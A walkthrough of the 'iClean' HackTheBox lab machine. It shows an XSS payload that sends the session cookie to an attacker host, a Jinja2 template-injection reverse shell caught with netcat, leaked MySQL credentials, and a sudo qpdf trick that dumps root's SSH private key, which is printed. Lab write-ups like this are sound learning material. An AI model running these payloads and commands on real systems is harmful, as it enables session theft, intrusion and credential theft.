sudo nmap -Pn -A 10.10.11.12
echo "10.10.11.12 iclean.htb" | sudo tee -a /etc/hosts
when i navigate to http://iclean.htb
it redirect to http://capiclean.htb
so I added that to /etc/hosts
and access
echo "10.10.11.12 capiclean.htb" | sudo tee -a /etc/hosts
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u "http://capiclean.htb/FUZZ" --hc 404 --hl 348
I found a quote
directory, let’s have a look.
I fired up burp suite and capture the requests and tested various input vectors and payloads. and I identified a potential vulnerability that could be exploited further.
first I started python3 http server
python3 -m http.server 1234
then put the below payload in the service paratmeter and encoded the payload string by using Ctrl+U
and send the request.
<img src=x onerror=fetch("http://ATTACK_IP:1234/"+document.cookie);>
Then after sometime I get the Cookie
. Yooo!
let’s store this cookie using cookie-editor and access the /dashboard
.
Visit http://capiclean.htb/InvoiceGenerator to generate an ID and fill it in casually. The ID generated here is # 3873147880
Then visit http://capiclean.htb/QRGenerator, fill in the above ID, and a QR code image link will be generated.
and let’s use Burpsuite to captures request.
During all this Request you will get a POST Request on /QRGenerator
which is likely Vulnerable to SSTI because as it is a Flask Application it is running Jinja Template in Background.
To test it I put Basic Payload in qr_link Parameter → `` and Boom I get 49
in Response
I attempted to exploit further to achieve Remote Code Execution (RCE). However, I discovered that the typical Jinja2 Server-Side Template Injection (SSTI) payload was ineffective. then i found this article and it help to find a bypass payload.
https://kleiber.me/blog/2021/10/31/python-flask-jinja2-ssti-example/
so first thing i started a netcat listener
nc -nlvp 4444
then put the payload in the qr_link parameter and use Ctrl+u
encode it and then send the request.
We able to obtain a shell as www-data.
After traversing directories and examining files, I identified the app.py
file, which inadvertently exposes the MySQL database credentials. Leveraging this discovery, I successfully gained access to the database.
db_config = {
'host': '127.0.0.1',
'user': 'iclean',
'password': 'pxCsmnGLckUb',
'database': 'capiclean'
}
before accessing mysql let’s harden the shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg
now let’s access the mysql:
mysql -h 127.0.0.1 -u iclean -p capiclean
show tables;
select * from users;
Enter the password that we found.
Let’s use Cracksation
to crack the hashes. https://crackstation.net/
so let’s use this credential to login as user consuela
su consuela
sudo -l
So I can ran qpdf
Command. So after searching in Google I found this documentation.
https://qpdf.readthedocs.io/en/stable/cli.html
First, utilize the -empty
parameter to create an empty document. Next, employ the -qdf
parameter to generate a PDF file in QDF mode. Then, utilize the -add-attachment
parameter to append a file as an attachment to the PDF. This time, employ the root’s id_rsa
, and name the generated file id_rsa.pdf
.
let’s run this command:
sudo /usr/bin/qpdf --empty --qdf --add-attachment /root/.ssh/id_rsa -- id_rsa.pdf
and it generated id_rsa.pdf
let’s cat
that.
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQQMb6Wn/o1SBLJUpiVfUaxWHAE64hBN
vX1ZjgJ9wc9nfjEqFS+jAtTyEljTqB+DjJLtRfP4N40SdoZ9yvekRQDRAAAAqGOKt0ljir
dJAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAxvpaf+jVIEslSm
JV9RrFYcATriEE29fVmOAn3Bz2d+MSoVL6MC1PISWNOoH4OMku1F8/g3jRJ2hn3K96RFAN
EAAAAgK2QvEb+leR18iSesuyvCZCW1mI+YDL7sqwb+XMiIE/4AAAALcm9vdEBpY2xlYW4B
AgMEBQ==
-----END OPENSSH PRIVATE KEY-----
let’s creat the id_rsa
file and granting the required privileges with chmod 600 id_rsa
, I used SSH with the -i
option to specify the private key and connect to the server